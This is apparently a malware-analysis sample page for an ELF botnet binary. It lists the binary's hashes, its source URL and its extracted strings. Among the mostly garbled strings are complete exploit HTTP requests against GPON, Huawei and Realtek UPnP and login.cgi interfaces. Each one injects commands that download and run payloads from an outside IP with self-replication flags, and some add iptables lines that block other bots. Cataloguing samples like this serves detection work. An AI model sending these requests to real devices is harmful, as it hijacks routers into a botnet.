Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 9004a60d57a2e7425118a0106ebba3f4 --

Hashes
MD5: 9004a60d57a2e7425118a0106ebba3f4
SHA1: 7e9dc4cdca3f532c1102e4cbeee6fbc4b90db6d5
SHA256: d8d7f55c5980b627eaa709fe87514dc7703a6215f96efaa34135f800eec36f13
SSDEEP: 1536:iabtOyNKy9ectDwawpNxIy7MtLECSASgHf:icNKyt2Ay7MtLE
Details
File Type: ELF
Yara Hits
Source
http://68.183.41.164/bins/frosty.sh4
Strings
		/sm"O,
qsj !<
Lds`La
Lds`La
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
&	tpgc`
"ca!# 
P)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
2-a#`)@
/s`miCWDX
	t@bsa9'
`)A|1)@,b9(
C)#8#a
B<cmA{"A
3a9'CV9")A
C)#8#b
'2qsP9
B<cmA{"C
3a9'CV9"
Cc,3Sf
C)#8#_
B<cmA{"B
3a9'CV9")A
"+'`7"
mHra,8
MK,;ba
"Bc#`ra
Gz#:"* 
f*!2-z#
Az"j!#c
ech3fsb
"ca:!#c
Cb+z":&#aj"R*
P2c003
3a9'CV9"
Cc,3Sf
C)#8#a
g3amA|1Qf
ql22,!!!%
'mA)B(C
B{";"$
a(1f1i
A3`\139
V2a,6f
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
r,aV11
CcKc8#
(w2"$qq
(w2"$qq
(w2"$qq
3e3a u
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
gb/#fba
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
GET /login.cgi?cli=aa%20aa%27;wget%20http://68.183.41.164/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hakai/2.0
POST /UD/?9 HTTP/1.1
User-Agent: SEFA
Content-Type: text/xml
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://68.183.41.164/icy.sh -O - > icy.sh; chmod 777 icy.sh; sh icy.sh; rm icy.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://68.183.41.164/bins/frosty.mips+-O+/tmp/egg;sh+/tmp/egg`&ipv=0
$(/bin/busybox wget -g 68.183.41.164 -l /tmp/.frosty.mips -r /bins/frosty.mips; /bin/busybox chmod 777 * /tmp/.frosty.mips; /tmp/.frosty.mips huawei.selfrep)
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://68.183.41.164/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://68.183.41.164/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
,9<0=$7
,7gaee
?8"efg
efg`ab
<=gael
75 edfm
5::=1fdef
5::=1fdeg
5::=1fde`
5::=1fdea
5::=1fdeb
?;d"=.,"
?;d509=:
758"=:
2=018efg
0125!8 
'!$$;& 
1$=7&;! 1&
9; ;&;85
93gadd
91&8=:
M$65&6SRS=
M$65&6SRS>B
/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors